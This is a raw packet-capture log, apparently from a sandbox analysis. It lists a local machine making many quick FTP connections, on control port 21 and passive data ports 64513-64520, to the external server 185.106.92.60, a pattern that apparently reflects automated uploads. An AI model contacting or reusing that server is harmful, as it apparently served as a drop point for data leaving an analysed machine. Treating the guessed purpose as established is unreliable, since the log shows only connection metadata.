                                                                                                                                    Oct 10, 2022 06:02:18.702972889 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.704272032 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.729336977 CEST2149715185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.729479074 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.738202095 CEST4971664513192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.763786077 CEST6451349716185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.763912916 CEST4971664513192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.764116049 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.790297985 CEST2149715185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.790513992 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.791260958 CEST4971664513192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.816385031 CEST6451349716185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.816416979 CEST6451349716185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.816721916 CEST4971664513192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.816879988 CEST2149715185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.817014933 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.817295074 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.844789982 CEST2149715185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.844831944 CEST2149715185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:18.845014095 CEST4971521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:18.999102116 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.021550894 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.021708012 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.048643112 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.048881054 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.053272009 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.053366899 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.053457975 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.053457975 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.053611994 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.076395035 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.076522112 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.076742887 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.100287914 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.100392103 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.100560904 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.123522997 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.123747110 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.125360012 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.148967981 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.149332047 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.150396109 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.173559904 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.173702002 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.191740036 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.214903116 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.215013981 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.215606928 CEST4971864514192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.238209963 CEST6451449718185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.238313913 CEST4971864514192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.238585949 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.262015104 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.262187958 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.262773991 CEST4971864514192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.285253048 CEST6451449718185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.285512924 CEST6451449718185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.285600901 CEST4971864514192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.286194086 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.286283016 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.286551952 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.308868885 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.308893919 CEST2149717185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.308986902 CEST4971721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.427696943 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.452744961 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.452944040 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.481750011 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.481826067 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.481997967 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.481997967 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.482281923 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.482347965 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.482434988 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.507076979 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.507256985 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.516647100 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.541484118 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.541657925 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.541740894 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.565243959 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.565427065 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.565682888 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.589823961 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.590101004 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.590491056 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.615129948 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.615339041 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.626633883 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.652019024 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.652152061 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.652381897 CEST4972064515192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.675822973 CEST6451549720185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.675947905 CEST4972064515192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.676268101 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.744281054 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.788305998 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.788470984 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.788945913 CEST4972064515192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.812076092 CEST6451549720185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.812122107 CEST6451549720185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.812232971 CEST4972064515192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.812458992 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.812643051 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.826766014 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:19.850965023 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.851023912 CEST2149719185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:19.851150990 CEST4971921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.012512922 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.037055969 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.037182093 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.067169905 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.067297935 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.067783117 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.067816973 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.067837000 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.067867994 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.068037987 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.095102072 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.095199108 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.095335960 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.121774912 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.121882915 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.122056961 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.147492886 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.147608995 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.150973082 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.177304029 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.177529097 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.182864904 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.206842899 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.207114935 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.208796978 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.236392021 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.236542940 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.238976002 CEST4972264516192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.265263081 CEST6451649722185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.265400887 CEST4972264516192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.265703917 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.294610023 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.294771910 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.308536053 CEST4972264516192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.334646940 CEST6451649722185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.334836960 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.334934950 CEST6451649722185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.335005045 CEST4972264516192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.335026979 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.335565090 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.359819889 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.359980106 CEST2149721185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.360045910 CEST4972121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.545964003 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.570209026 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.570370913 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.598759890 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.598793030 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.598809958 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.598958969 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.599176884 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.623548985 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.625037909 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.625179052 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.649525881 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.651027918 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.651180029 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.675566912 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.675677061 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.675878048 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.699644089 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.701857090 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.702254057 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.727057934 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.729202032 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.730667114 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.756170034 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.757275105 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.757534981 CEST4972464518192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.783746004 CEST6451849724185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.783946991 CEST4972464518192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.784125090 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.809187889 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.809322119 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.810400963 CEST4972464518192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.834626913 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.834754944 CEST6451849724185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.834846020 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.835118055 CEST6451849724185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.835186958 CEST4972464518192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.839880943 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:20.863400936 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.863456964 CEST2149723185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:20.863548994 CEST4972321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.016978025 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.041573048 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.041946888 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.070777893 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.070827961 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.070947886 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.070961952 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.071024895 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.072568893 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.097151041 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.097246885 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.097409964 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.121596098 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.121792078 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.121958971 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.145585060 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.149260998 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.149969101 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.177587986 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.179145098 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.179585934 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.203413010 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.203954935 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.205468893 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.230734110 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.235024929 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.235230923 CEST4972664519192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.260945082 CEST6451949726185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.261110067 CEST4972664519192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.261368036 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.285797119 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.286077976 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.300208092 CEST4972664519192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.324950933 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.325088024 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.325196981 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.326261044 CEST6451949726185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.326303959 CEST6451949726185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.326441050 CEST4972664519192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.348958015 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.349006891 CEST2149725185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.349123001 CEST4972521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.466253996 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.489631891 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.489768028 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.517694950 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.517745018 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.517788887 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.517816067 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.517837048 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.517993927 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.518086910 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.542439938 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.542615891 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.542834044 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.566992998 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.567162991 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.567437887 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.591176987 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.595240116 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.595412016 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.620280027 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.622360945 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.630623102 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.654696941 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.654892921 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.657152891 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.681212902 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.681401968 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.681744099 CEST4972864520192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.705969095 CEST6452049728185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.706285954 CEST4972864520192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.706810951 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.731276035 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.733452082 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.733931065 CEST4972864520192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.757366896 CEST6452049728185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.760178089 CEST6452049728185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.760284901 CEST4972864520192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.762485981 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.762603998 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.762818098 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.786375046 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.788106918 CEST2149727185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.788368940 CEST4972721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.896238089 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.919287920 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.919413090 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.945817947 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.945863962 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.945895910 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.945920944 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.945956945 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.947058916 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.970349073 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:21.971093893 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:21.978624105 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.001770020 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.001840115 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.001983881 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.025212049 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.027098894 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.027230024 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.050837040 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.051131010 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.052452087 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.075627089 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.079236031 CEST4972921192.168.2.3185.106.92.60
